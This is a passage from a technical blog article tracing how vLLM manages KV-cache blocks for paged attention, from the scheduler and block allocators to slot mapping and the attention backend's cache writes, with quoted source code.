<p>Back in CPUWorker._init_cache_engine: after CPUCacheEngine is initialized, bind_kv_cache is called. We won't dig into it for now; essentially it binds this KV cache to the attention modules so the model can find it during inference. I'll analyze it in a future article on the vLLM flow.</p>
<p>At this point the physical blocks are allocated; next we look at virtual block management.</p>
<h2> Block management for inference requests </h2>
<p>Block management corresponds to the left half of this figure.</p>
<p><img src="/assets/img/vllmpageattn/4.png" alt="" /></p>
<h3> Scheduler initialization </h3>
<p>All vLLM requests are scheduled by the Scheduler, which has a member block_manager, normally an instance of SelfAttnBlockSpaceManager (a BlockSpaceManager subclass).
The relevant call chain is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
Scheduler.__init__
-->BlockSpaceManagerImpl(SelfAttnBlockSpaceManager.__init__)
-->CpuGpuBlockAllocator.create
-->NaiveBlockAllocator(NaiveBlockAllocator.__init__)
-->BlockPool
</code></pre></div></div>
<p>Part of Scheduler.__init__ is shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class Scheduler:

    def __init__(
        self,
        scheduler_config: SchedulerConfig,
        cache_config: CacheConfig,
        lora_config: Optional[LoRAConfig],
        pipeline_parallel_size: int = 1,
        output_proc_callback: Optional[Callable] = None,
    ) -> None:
        self.scheduler_config = scheduler_config
        self.cache_config = cache_config
        # Note for LoRA scheduling: the current policy is extremely
        # simple and NOT fair. It can lead to starvation of some
        # LoRAs. This should be improved in the future.
        self.lora_config = lora_config

        version = "selfattn"
        if (self.scheduler_config.runner_type == "pooling"
                or self.cache_config.is_attention_free):
            version = "placeholder"

        BlockSpaceManagerImpl = BlockSpaceManager.get_block_space_manager_class(
            version)

        num_gpu_blocks = cache_config.num_gpu_blocks
        if num_gpu_blocks:
            num_gpu_blocks //= pipeline_parallel_size

        num_cpu_blocks = cache_config.num_cpu_blocks
        if num_cpu_blocks:
            num_cpu_blocks //= pipeline_parallel_size

        # Create the block space manager.
        self.block_manager = BlockSpaceManagerImpl(
            block_size=self.cache_config.block_size,
            num_gpu_blocks=num_gpu_blocks,
            num_cpu_blocks=num_cpu_blocks,
            sliding_window=self.cache_config.sliding_window,
            enable_caching=self.cache_config.enable_prefix_caching,
        )
</code></pre></div></div>
<p>The key parameters when initializing block_manager are block_size, num_gpu_blocks, and num_cpu_blocks.
Next, the implementation of SelfAttnBlockSpaceManager.__init__:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class SelfAttnBlockSpaceManager(BlockSpaceManager):

    def __init__(
        self,
        block_size: int,
        num_gpu_blocks: int,
        num_cpu_blocks: int,
        watermark: float = 0.01,
        sliding_window: Optional[int] = None,
        enable_caching: bool = False,
    ) -> None:
        self.block_size = block_size
        self.num_total_gpu_blocks = num_gpu_blocks
        self.num_total_cpu_blocks = num_cpu_blocks
        ...
        self.block_allocator = CpuGpuBlockAllocator.create(
            allocator_type="prefix_caching" if enable_caching else "naive",
            num_gpu_blocks=num_gpu_blocks,
            num_cpu_blocks=num_cpu_blocks,
            block_size=block_size,
        )

        self.block_tables: Dict[SeqId, BlockTable] = {}
        ...
</code></pre></div></div>
<p>CpuGpuBlockAllocator.create essentially returns the allocators used to hand out physical blocks, one for GPU and one for CPU. Another important member of SelfAttnBlockSpaceManager is block_tables, which maps sequence IDs to block tables; through this member the block tables of all seq groups are managed.</p>
<p>Looking at CpuGpuBlockAllocator.create, in the common case it creates a NaiveBlockAllocator, whose __init__ function is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class NaiveBlockAllocator(BlockAllocator):
    """A simple block allocator that manages blocks of memory without prefix
    caching.

    Args:
        create_block (Block.Factory): A factory function for creating new
            blocks. This is used when a NaiveBlockAllocator is composed within
            a prefix caching allocator -- the naive block allocator must
            construct prefix caching blocks (but shouldn't know anything else
            about them).
        num_blocks (int): The total number of blocks to manage.
        block_size (int): The size of each block in tokens.
        block_ids (Optional[Iterable[int]], optional): An optional iterable of
            block IDs. If not provided, block IDs will be assigned sequentially
            from 0 to num_blocks - 1.
    """

    def __init__(
        self,
        create_block: Block.Factory,
        num_blocks: int,
        block_size: int,
        block_ids: Optional[Iterable[int]] = None,
        block_pool: Optional[BlockPool] = None,
    ):
        if block_ids is None:
            block_ids = range(num_blocks)

        self._free_block_indices: Deque[BlockId] = deque(block_ids)
        self._all_block_indices = frozenset(block_ids)
        assert len(self._all_block_indices) == num_blocks

        self._refcounter = RefCounter(
            all_block_indices=self._free_block_indices)
        self._block_size = block_size

        self._cow_tracker = CopyOnWriteTracker(
            refcounter=self._refcounter.as_readonly())

        if block_pool is None:
            extra_factor = 4
            # Pre-allocate "num_blocks * extra_factor" block objects.
            # The "* extra_factor" is a buffer to allow more block objects
            # than physical blocks
            self._block_pool = BlockPool(self._block_size, create_block, self,
                                         num_blocks * extra_factor)
        else:
            # In this case, the block pool is provided by the caller,
            # which means that there is most likely a need to share
            # a block pool between allocators
            self._block_pool = block_pool
</code></pre></div></div>
<p>When CpuGpuBlockAllocator.create builds the NaiveBlockAllocator instances, it first assigns a range of ids to the GPU and CPU blocks as unique physical block numbers. In NaiveBlockAllocator.__init__, these ids are stored in the _all_block_indices member; _free_block_indices tracks the currently free physical blocks, and at initialization the two are obviously identical. The _refcounter member records the reference count per block id, i.e. how many requests share that physical block.</p>
<p>After this initial bookkeeping, a BlockPool is created. Note that it holds virtual blocks, whose job is to record the tokens a block stores, the physical block id, and so on.
The create_block argument to BlockPool is the NaiveBlock class, and pool_size is num_blocks * extra_factor: there are more virtual blocks than physical ones, much as the virtual address space of an OS is far larger than physical memory.</p>
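<p>The bookkeeping just described, a deque of free ids plus a per-id reference count, can be sketched in a few lines (a simplified model, not the vLLM class itself):</p>

```python
from collections import deque

class TinyBlockAllocator:
    """Simplified model of NaiveBlockAllocator's free-list bookkeeping."""

    def __init__(self, num_blocks: int):
        self._free = deque(range(num_blocks))       # _free_block_indices
        self._refcount = {i: 0 for i in range(num_blocks)}

    def allocate(self) -> int:
        if not self._free:
            raise RuntimeError("no free blocks")
        block_id = self._free.popleft()
        self._refcount[block_id] += 1
        return block_id

    def free(self, block_id: int) -> None:
        self._refcount[block_id] -= 1
        if self._refcount[block_id] == 0:
            self._free.append(block_id)             # back on the free list

alloc = TinyBlockAllocator(2)
a = alloc.allocate()          # a == 0
b = alloc.allocate()          # b == 1
alloc.free(a)                 # block 0 returns to the free list
assert alloc.allocate() == 0  # and is handed out again
```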
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class BlockPool:
    """Used to pre-allocate block objects, in order to avoid excessive python
    object allocations/deallocations.
    The pool starts from "pool_size" objects and will increase to more objects
    if necessary

    Note that multiple block objects may point to the same physical block id,
    which is why this pool is needed, so that it will be easier to support
    prefix caching and more complicated sharing of physical blocks.
    """

    def __init__(self, block_size: int, create_block: Block.Factory,
                 allocator: BlockAllocator, pool_size: int):
        self._block_size = block_size
        self._create_block = create_block
        self._allocator = allocator
        self._pool_size = pool_size
        assert self._pool_size >= 0

        self._free_ids: Deque[int] = deque(range(self._pool_size))
        self._pool = []
        for i in range(self._pool_size):
            self._pool.append(
                self._create_block(prev_block=None,
                                   token_ids=[],
                                   block_size=self._block_size,
                                   allocator=self._allocator,
                                   block_id=None,
                                   extra_hash=None))
</code></pre></div></div>
<p>The core is the creation of NaiveBlock objects:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class NaiveBlock(Block):
    ...
    def __init__(self,
                 prev_block: Optional[Block],
                 token_ids: List[int],
                 block_size: int,
                 allocator: BlockAllocator,
                 block_id: Optional[int] = None,
                 _cow_target: Optional[Block] = None,
                 extra_hash: Optional[int] = None):
        self._token_ids: List[int] = []
        self._block_size = block_size
        self._prev_block = prev_block
        self._block_id = block_id
        self._allocator = allocator
        self._cow_target = _cow_target if _cow_target is not None else self

        self._append_token_ids_no_cow(token_ids)
</code></pre></div></div>
<p>As shown, a logical block contains the token IDs stored in that block (_token_ids) and its physical block ID (_block_id). The figure below shows the data structures at this point.</p>
<p><img src="/assets/img/vllmpageattn/5.png" alt="" /></p>
<p>Next we analyze how vLLM allocates virtual blocks for an inference request, which boils down to the management of SelfAttnBlockSpaceManager's block_tables member.</p>
<h3> Request handling </h3>
<p>Request scheduling in vLLM starts from _schedule_prefills, which schedules requests in the prefill phase. vLLM handles requests by seq group: the sequences generated from one prompt form a seq group. During _schedule_prefills, self._allocate_and_set_running(seq_group) is called to start allocating blocks for a new seq group. The full call chain is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
Scheduler._schedule_prefills
-->self.block_manager.can_allocate
-->self._allocate_and_set_running
-->self.block_manager.allocate(SelfAttnBlockSpaceManager.allocate)
-->self._allocate_sequence
-->block_table.allocate
-->self._allocate_blocks_for_token_ids
-->self._allocator.allocate_immutable_blocks
-->self._allocator.allocate_mutable_block
-->self.update
</code></pre></div></div>
<p>The core function is _allocate_and_set_running, which calls block_manager.allocate to allocate a BlockTable for the current seq_group.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def _allocate_and_set_running(self, seq_group: SequenceGroup) -> None:
    self.block_manager.allocate(seq_group)
    for seq in seq_group.get_seqs(status=SequenceStatus.WAITING):
        seq.status = SequenceStatus.RUNNING
</code></pre></div></div>
<p>SelfAttnBlockSpaceManager's block_tables member starts being populated in allocate. block_tables is a dict whose keys are the seq_ids of the seq group's sequences and whose values are BlockTable structures.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def allocate(self, seq_group: SequenceGroup) -> None:
    # Allocate self-attention block tables for decoder sequences
    waiting_seqs = seq_group.get_seqs(status=SequenceStatus.WAITING)
    assert not (set(seq.seq_id for seq in waiting_seqs)
                & self.block_tables.keys()), "block table already exists"

    # NOTE: Here we assume that all sequences in the group have the same
    # prompt.
    seq = waiting_seqs[0]
    block_table: BlockTable = self._allocate_sequence(seq)
    self.block_tables[seq.seq_id] = block_table

    # Track seq
    self._last_access_blocks_tracker.add_seq(seq.seq_id)

    # Assign the block table for each sequence.
    for seq in waiting_seqs[1:]:
        self.block_tables[seq.seq_id] = block_table.fork()

        # Track seq
        self._last_access_blocks_tracker.add_seq(seq.seq_id)
</code></pre></div></div>
<p>SelfAttnBlockSpaceManager._allocate_sequence allocates the BlockTable:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def _allocate_sequence(self, seq: Sequence) -> BlockTable:
    block_table = BlockTable(
        block_size=self.block_size,
        block_allocator=self.block_allocator,
        max_block_sliding_window=self.max_block_sliding_window,
    )
    if seq.get_token_ids():
        # NOTE: If there are any factors affecting the block besides
        # token_ids, they should be added as input to extra_hash.
        extra_hash = seq.extra_hash()

        # Add blocks to the block table only if the sequence is non empty.
        block_table.allocate(token_ids=seq.get_token_ids(),
                             extra_hash=extra_hash)

    return block_table


class BlockTable:
    ...
    def __init__(
        self,
        block_size: int,
        block_allocator: DeviceAwareBlockAllocator,
        _blocks: Optional[List[Block]] = None,
        max_block_sliding_window: Optional[int] = None,
    ):
        self._block_size = block_size
        self._allocator = block_allocator
        if _blocks is None:
            _blocks = []
        self._blocks: BlockList = BlockList(_blocks)

        self._max_block_sliding_window = max_block_sliding_window
        self._num_full_slots = self._get_num_token_ids()
</code></pre></div></div>
<p>The important member of BlockTable is _blocks, a BlockList structure; the latter holds a list of Block objects (_blocks) and a list of ints (_block_ids). _blocks contains all the virtual blocks of a sequence, and _block_ids the IDs of their corresponding physical blocks.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class BlockList:
    ...
    def __init__(self, blocks: List[Block]):
        self._blocks: List[Block] = []
        self._block_ids: List[int] = []

        self.update(blocks)
</code></pre></div></div>
<p>Back in SelfAttnBlockSpaceManager._allocate_sequence: once the BlockTable is created, physical blocks can be allocated for the prefill-phase sequence via the call to block_table.allocate.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def allocate(self,
             token_ids: List[int],
             device: Device = Device.GPU,
             extra_hash: Optional[int] = None) -> None:
    ...
    assert not self._is_allocated
    assert token_ids
    blocks = self._allocate_blocks_for_token_ids(prev_block=None,
                                                 token_ids=token_ids,
                                                 device=device,
                                                 extra_hash=extra_hash)
    self.update(blocks)
    self._num_full_slots = len(token_ids)
</code></pre></div></div>
<p>The core is BlockTable._allocate_blocks_for_token_ids:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def _allocate_blocks_for_token_ids(
        self,
        prev_block: Optional[Block],
        token_ids: List[int],
        device: Device,
        extra_hash: Optional[int] = None) -> List[Block]:
    blocks: List[Block] = []

    block_token_ids = []
    tail_token_ids = []
    for cur_token_ids in chunk_list(token_ids, self._block_size):
        if len(cur_token_ids) == self._block_size:
            block_token_ids.append(cur_token_ids)
        else:
            tail_token_ids.append(cur_token_ids)

    if block_token_ids:
        blocks.extend(
            self._allocator.allocate_immutable_blocks(
                prev_block,
                block_token_ids=block_token_ids,
                device=device,
                extra_hash=extra_hash))
        prev_block = blocks[-1]

    if tail_token_ids:
        assert len(tail_token_ids) == 1
        cur_token_ids = tail_token_ids[0]

        block = self._allocator.allocate_mutable_block(
            prev_block=prev_block, device=device, extra_hash=extra_hash)
        block.append_token_ids(cur_token_ids)

        blocks.append(block)

    return blocks
</code></pre></div></div>
<p>_allocate_blocks_for_token_ids uses two local lists: block_token_ids holds the full chunks of block_size token IDs, and tail_token_ids holds the final chunk with fewer than block_size tokens.</p>
<p>Physical blocks are then allocated for the virtual blocks. The chunks in block_token_ids are already full (block_size tokens each) and will not grow, so allocate_immutable_blocks allocates immutable blocks for them; the tail block is not yet full and will be appended to later, so allocate_mutable_block allocates a mutable block for it.</p>
<p>First, the implementation of allocate_immutable_blocks:</p>
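<p>The split performed by chunk_list can be reproduced in a few lines (a sketch of the behavior, not vLLM's utility itself):</p>

```python
def split_full_and_tail(token_ids, block_size):
    """Split token ids into full block_size chunks plus an optional tail."""
    chunks = [token_ids[i:i + block_size]
              for i in range(0, len(token_ids), block_size)]
    full = [c for c in chunks if len(c) == block_size]   # immutable blocks
    tail = [c for c in chunks if len(c) < block_size]    # mutable block
    return full, tail

full, tail = split_full_and_tail(list(range(10)), block_size=4)
assert full == [[0, 1, 2, 3], [4, 5, 6, 7]]
assert tail == [[8, 9]]  # will keep growing during decode
```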
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def allocate_immutable_blocks(
        self,
        prev_block: Optional[Block],
        block_token_ids: List[List[int]],
        extra_hash: Optional[int] = None,
        device: Optional[Device] = None) -> List[Block]:
    assert device is None
    num_blocks = len(block_token_ids)

    block_ids = []
    for i in range(num_blocks):
        block_ids.append(self._allocate_block_id())

    blocks = []
    for i in range(num_blocks):
        prev_block = self._block_pool.init_block(
            prev_block=prev_block,
            token_ids=block_token_ids[i],
            block_size=self._block_size,
            physical_block_id=block_ids[i])
        blocks.append(prev_block)

    return blocks
</code></pre></div></div>
<p>num_blocks is the number of blocks needed, i.e. the length of block_token_ids. _allocate_block_id is then called to allocate num_blocks physical blocks, popping directly from NaiveBlockAllocator's _free_block_indices.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def _allocate_block_id(self) -> BlockId:
    if not self._free_block_indices:
        raise BlockAllocator.NoFreeBlocksError()

    block_id = self._free_block_indices.popleft()
    self._refcounter.incr(block_id)
    return block_id
</code></pre></div></div>
<p>Finally, allocate_immutable_blocks calls self._block_pool.init_block to initialize the virtual blocks; the key arguments are token_ids, the token IDs of each block, and physical_block_id, the physical block ID.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
for i in range(num_blocks):
    prev_block = self._block_pool.init_block(
        prev_block=prev_block,
        token_ids=block_token_ids[i],
        block_size=self._block_size,
        physical_block_id=block_ids[i])
    blocks.append(prev_block)
</code></pre></div></div>
<p>init_block calls NaiveBlock.__init__ again; unlike at pool initialization, where the token IDs are empty, this time token_ids and physical_block_id carry actual values.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def init_block(self,
               prev_block: Optional[Block],
               token_ids: List[int],
               block_size: int,
               physical_block_id: Optional[int],
               extra_hash: Optional[int] = None) -> Block:
    if len(self._free_ids) == 0:
        self.increase_pool()
        assert len(self._free_ids) > 0
    pool_id = self._free_ids.popleft()
    block = self._pool[pool_id]
    block.__init__(  # type: ignore[misc]
        prev_block=prev_block,
        token_ids=token_ids,
        block_size=block_size,
        allocator=block._allocator,  # type: ignore[attr-defined]
        block_id=physical_block_id,
        extra_hash=extra_hash)
    block.pool_id = pool_id  # type: ignore[attr-defined]
    return block
</code></pre></div></div>
<p>Besides initializing the related fields, the most important thing NaiveBlock.__init__ does is call self._append_token_ids_no_cow to append the current token IDs to NaiveBlock._token_ids.</p>
<p>With this, allocate_immutable_blocks has allocated the physical blocks and initialized the virtual blocks. Extending the initialization figure above, we can draw the data-structure relationships below, which show clearly how virtual blocks map to physical blocks.</p>
<p><img src="/assets/img/vllmpageattn/6.png" alt="" /></p>
<h2> Using the KV cache </h2>
<h3> Preparing data before inference </h3>
<p>To understand how the KV cache is used, i.e. how the virtual blocks above are resolved to the real physical blocks, we need a quick look at vLLM's inference flow. Inference happens in LLMEngine.step; here is a brief sketch of its call chain. Note: my vLLM environment broke while I was writing this article, so the order below is written from memory of earlier debugging and may contain mistakes; I will verify it after setting up vLLM again.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
LLMEngine.step
-->self.scheduler[virtual_engine].schedule()
-->ExecuteModelRequest
-->self.model_executor.execute_model
-->DistributedExecutorBase.execute_model
-->self._driver_execute_model
-->DistributedExecutorBase.execute_model
-->LocalOrDistributedWorkerBase.execute_model
-->self.prepare_input
-->self._get_driver_input_and_broadcast
-->self.prepare_worker_input
-->model_runner.prepare_model_input
-->_prepare_model_input_tensors
-->self.builder.build
-->self._build_input_data
-->self.att_metadata_builder.build
-->self.execute_worker
-->self.model_runner.execute_model
</code></pre></div></div>
<p>LLMEngine.step calls schedule() to get the requests to run in this step. schedule() returns a variable seq_group_metadata_list, which holds the metadata of the seq groups about to be scheduled; the metadata of each seq is stored in a SequenceGroupMetadata.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
(seq_group_metadata_list, scheduler_outputs,
 allow_async_output_proc
 ) = self.scheduler[virtual_engine].schedule()
ctx.seq_group_metadata_list = seq_group_metadata_list
</code></pre></div></div>
<p>SequenceGroupMetadata has an important member, block_tables. Do not confuse it with the block_tables of the SelfAttnBlockSpaceManager above: here block_tables is a dict whose keys are seq IDs and whose values are lists of physical block IDs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class SequenceGroupMetadata(
    ...
    request_id: str
    is_prompt: bool
    seq_data: dict[int, SequenceData]
    sampling_params: Optional[SamplingParams]
    block_tables: dict[int, list[int]]
    do_sample: bool = True
</code></pre></div></div>
<p>The seq_group_metadata_list variable is built as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class Scheduler:
    def schedule():
        ...
        for seq in seq_group.get_seqs(status=SequenceStatus.RUNNING):
            seq_id = seq.seq_id
            seq_data[seq_id] = seq.data
            block_tables[seq_id] = self.block_manager.get_block_table(seq)
            self.block_manager.access_all_blocks_in_seq(seq, now)
        ...
        if is_first_prefill or not self.scheduler_config.send_delta_data:
            seq_group_metadata = SequenceGroupMetadata(
                request_id=seq_group.request_id,
                is_prompt=is_prompt,
                seq_data=seq_data,
                sampling_params=seq_group.sampling_params,
                block_tables=block_tables,
                do_sample=do_sample,
                pooling_params=seq_group.pooling_params,
                token_chunk_size=token_chunk_size,
                lora_request=seq_group.lora_request,
                computed_block_nums=common_computed_block_nums,
                encoder_seq_data=encoder_seq_data,
                cross_block_table=cross_block_table,
                state=seq_group.state,
                token_type_ids=seq_group.token_type_ids,
                ..
            )
        else:
            ...
        seq_group_metadata_list.append(seq_group_metadata)
</code></pre></div></div>
<p>The core part is the computation of block_tables; as you can see, it essentially fetches the physical block IDs corresponding to each seq ID.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class SelfAttnBlockSpaceManager:
    ...
    def get_block_table(self, seq: Sequence) -> List[int]:
        block_ids = self.block_tables[seq.seq_id].physical_block_ids
        return block_ids  # type: ignore

class BlockTable:
    def physical_block_ids(self) -> List[int]:
        ...
        return self._blocks.ids()
</code></pre></div></div>
<p>Next, let's look at the _build_input_data function in ModelInputForCPUBuilder.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def _build_input_data(self):
    for seq_group_metadata in self.seq_group_metadata_list:
        for seq_id, seq_data in seq_group_metadata.seq_data.items():
            if seq_group_metadata.is_prompt:
                self._compute_prompt_input_tokens(self.input_data,
                                                  seq_group_metadata,
                                                  seq_data, seq_id)
                if seq_group_metadata.multi_modal_data:
                    self._compute_multi_modal_input(
                        seq_group_metadata, seq_data)
            else:
                self._compute_decode_input_tokens(self.input_data,
                                                  seq_group_metadata,
                                                  seq_data, seq_id)
</code></pre></div></div>
<p>_compute_prompt_input_tokens and _compute_decode_input_tokens compute the token-related data for the prefill and decode phases respectively; the parts related to paged attention are the block table and the slot mapping. Let's take _compute_prompt_input_tokens as an example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def _compute_prompt_input_tokens(self, data: ModelInputData,
                                 seq_group_metadata: SequenceGroupMetadata,
                                 seq_data: SequenceData, seq_id: int):
    """
    Compute prompt input tokens, positions, block table and slot mapping.
    """
    token_chunk_size = seq_group_metadata.token_chunk_size
    block_size = self.runner.block_size
    block_table = seq_group_metadata.block_tables[seq_id]
    seq_len = seq_data.get_len()
    context_len = seq_data.get_num_computed_tokens()
    seq_len = min(seq_len, context_len + token_chunk_size)
    ...
    tokens = seq_data.get_token_ids()
    tokens = tokens[context_len:seq_len]
    token_positions = range(context_len, seq_len)
    token_types = seq_group_metadata.token_type_ids
    # For encoder-only models, the block_table is None,
    # and there is no need to initialize the slot_mapping.
    if block_table is not None:
        slot_mapping = [_PAD_SLOT_ID] * len(token_positions)
        for i, pos in enumerate(token_positions):
            block_number = block_table[pos // block_size]
            block_offset = pos % block_size
            slot = block_number * block_size + block_offset
            slot_mapping[i] = slot
        data.slot_mapping.extend(slot_mapping)
    # The MROPE positions are prepared in _compute_multi_modal_input
    data.input_positions.extend(token_positions)
    if data.token_type_ids is not None:
        data.token_type_ids.extend(token_types if token_types else [])
    # Update fields
    data.input_tokens.extend(tokens)
    data.num_prefills += 1
    data.num_prefill_tokens += len(tokens)
    data.query_lens.append(len(tokens))
    data.prefill_block_tables.append(block_table)
    data.seq_lens.append(seq_len)
</code></pre></div></div>
<p>The block_table variable comes from the block_tables member of SequenceGroupMetadata. The key step here is computing the slot_mapping list. In the prefill phase, the length of token_positions is the prompt length, so slot_mapping has length seq len, and each value in slot_mapping is a position inside a physical block. slot_mapping is a bit like a TLB: it maps tokens directly to physical slots.</p>
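<p>The slot computation above can be sketched in a few lines of Python. Note that block_table and the positions below are made-up illustrative values, not taken from a real vLLM run:</p>

```python
# Map each token position to a flat "slot" in the physical KV cache:
# slot = physical_block_id * block_size + offset_within_block
block_size = 4
block_table = [7, 2, 9]       # hypothetical physical block IDs for one seq
token_positions = range(0, 10)

slot_mapping = [
    block_table[pos // block_size] * block_size + pos % block_size
    for pos in token_positions
]
print(slot_mapping)  # [28, 29, 30, 31, 8, 9, 10, 11, 36, 37]
```

<p>Tokens 0-3 land in physical block 7, tokens 4-7 in block 2, and tokens 8-9 in block 9.</p>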
<p>注意看上面的_build_input_data,其实是对于seq group中每一个seq,都是计算了token相关信息,所以vLLM中的一次调度是以一个seq group为单位的。</p>
<h3> Running inference </h3>
<p>With the data prepared, inference can begin; it runs in CPUModelRunner.execute_model. set_forward_context sets up the context, which includes associating the attention backend and the cache engine with the current forward pass.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
with set_forward_context(model_input.attn_metadata, self.vllm_config,
model_input.virtual_engine):
hidden_states = model_executable(
input_ids=model_input.input_tokens,
positions=model_input.input_positions,
intermediate_tensors=intermediate_tensors,
**execute_model_kwargs,
**multimodal_kwargs,
)
</code></pre></div></div>
<p>Taking Qwen2ForCausalLM as an example, here is the overall flow:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
Qwen2ForCausalLM.forward
-->self.model(Qwen2Model.forward)
-->layer(Qwen2DecoderLayer.forward)
-->Qwen2Attention.forward
-->Attention.forward
-->torch.ops.vllm.unified_attention
-->self.impl.forward(TorchSDPABackendImpl.forward)
-->PagedAttention.write_to_paged_cache
-->self._run_sdpa_forward
-->PagedAttention.forward_decode
</code></pre></div></div>
<p>We will not analyze the whole flow in detail here; we only look at the parts related to paged attention, mainly TorchSDPABackendImpl.forward.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class TorchSDPABackendImpl:
def forward(
self,
layer: AttentionLayer,
query: torch.Tensor,
key: torch.Tensor,
value: torch.Tensor,
kv_cache: torch.Tensor,
attn_metadata: TorchSDPAMetadata, # type: ignore
output: Optional[torch.Tensor] = None,
) -> torch.Tensor:
...
attn_type = self.attn_type
...
# Reshape the query, key, and value tensors.
query = query.view(-1, self.num_heads, self.head_size)
if key is not None:
assert value is not None
key = key.view(-1, self.num_kv_heads, self.head_size)
value = value.view(-1, self.num_kv_heads, self.head_size)
else:
assert value is None
if (attn_type != AttentionType.ENCODER and kv_cache.numel() > 0):
# KV-cache during decoder-self- or
# encoder-decoder-cross-attention, but not
# during encoder attention.
#
# Even if there are no new key/value pairs to cache,
# we still need to break out key_cache and value_cache
# i.e. for later use by paged attention
key_cache, value_cache = PagedAttention.split_kv_cache(
kv_cache, self.num_kv_heads, self.head_size)
if (key is not None) and (value is not None):
if attn_type == AttentionType.ENCODER_DECODER:
...
else:
# Update self-attention KV cache (prefill/decode)
updated_slot_mapping = attn_metadata.slot_mapping
PagedAttention.write_to_paged_cache(
key, value, key_cache, value_cache, updated_slot_mapping,
self.kv_cache_dtype, layer._k_scale, layer._v_scale)
if attn_type != AttentionType.ENCODER:
# Decoder self-attention supports chunked prefill.
# Encoder/decoder cross-attention requires no chunked
# prefill (100% prefill or 100% decode tokens, no mix)
num_prefill_tokens = attn_metadata.num_prefill_tokens
num_decode_tokens = attn_metadata.num_decode_tokens
else:
# Encoder attention - chunked prefill is not applicable;
# derive token-count from query shape & and treat them
# as 100% prefill tokens
assert attn_metadata.num_encoder_tokens is not None
num_prefill_tokens = attn_metadata.num_encoder_tokens
num_decode_tokens = 0
if attn_type == AttentionType.DECODER:
# Only enforce this shape-constraint for decoder
# self-attention
assert key.shape[0] == num_prefill_tokens + num_decode_tokens
assert value.shape[0] == num_prefill_tokens + num_decode_tokens
output = torch.empty_like(query)
if prefill_meta := attn_metadata.prefill_metadata:
assert attn_metadata.seq_lens is not None
if not prefill_meta.prefill_metadata.chunked_prefill: # type: ignore
self._run_sdpa_forward(output,
query,
key,
value,
prefill_meta,
attn_type=attn_type)
else:
# prefix-enabled attention
assert not self.need_mask
import intel_extension_for_pytorch.llm.modules as ipex_modules
output = torch.empty_like(query)
ipex_modules.PagedAttention.flash_attn_varlen_func(
output[:prefill_meta.num_prefill_tokens, :, :],
query[:prefill_meta.num_prefill_tokens, :, :],
key_cache,
value_cache,
prefill_meta.query_start_loc,
prefill_meta.kv_start_loc,
prefill_meta.max_query_len,
prefill_meta.max_kv_len,
self.scale,
True,
prefill_meta.prefill_block_tables,
self.alibi_slopes,
)
if decode_meta := attn_metadata.decode_metadata:
assert attn_type != AttentionType.ENCODER_ONLY, (
"Encoder-only models should not have decode metadata.")
# Decoding run.
(
seq_lens_arg,
max_seq_len_arg,
block_tables_arg,
) = decode_meta.get_seq_len_block_table_args(attn_type)
PagedAttention.forward_decode(
output[attn_metadata.num_prefill_tokens:, :, :],
query[attn_metadata.num_prefill_tokens:, :, :],
key_cache,
value_cache,
block_tables_arg,
seq_lens_arg,
max_seq_len_arg,
self.kv_cache_dtype,
self.num_kv_heads,
self.scale,
self.alibi_slopes,
layer._k_scale,
layer._v_scale,
)
# Reshape the output tensor.
return output.view(-1, self.num_heads * self.head_size)
</code></pre></div></div>
<p>Step one: write the K/V of the current tokens into the KV cache. First, the K and V are split into key_cache and value_cache via PagedAttention.split_kv_cache; the kv_cache here is the physical blocks. Then PagedAttention.write_to_paged_cache is called to write the current K/V into the physical blocks; it goes through ops.reshape_and_cache -> torch.ops._C_cache_ops.reshape_and_cache.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
key_cache, value_cache = PagedAttention.split_kv_cache(
    kv_cache, self.num_kv_heads, self.head_size)
if (key is not None) and (value is not None):
    if attn_type == AttentionType.ENCODER_DECODER:
        # Update cross-attention KV cache (prefill-only)
        # During cross-attention decode, key & value will be None,
        # preventing this IF-statement branch from running
        updated_slot_mapping = attn_metadata.cross_slot_mapping
    else:
        # Update self-attention KV cache (prefill/decode)
        updated_slot_mapping = attn_metadata.slot_mapping
    PagedAttention.write_to_paged_cache(
        key, value, key_cache, value_cache, updated_slot_mapping,
        self.kv_cache_dtype, layer._k_scale, layer._v_scale)
</code></pre></div></div>
<p>reshape_and_cache eventually reaches the function of the same name in csrc/cpu/cache.cpp.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
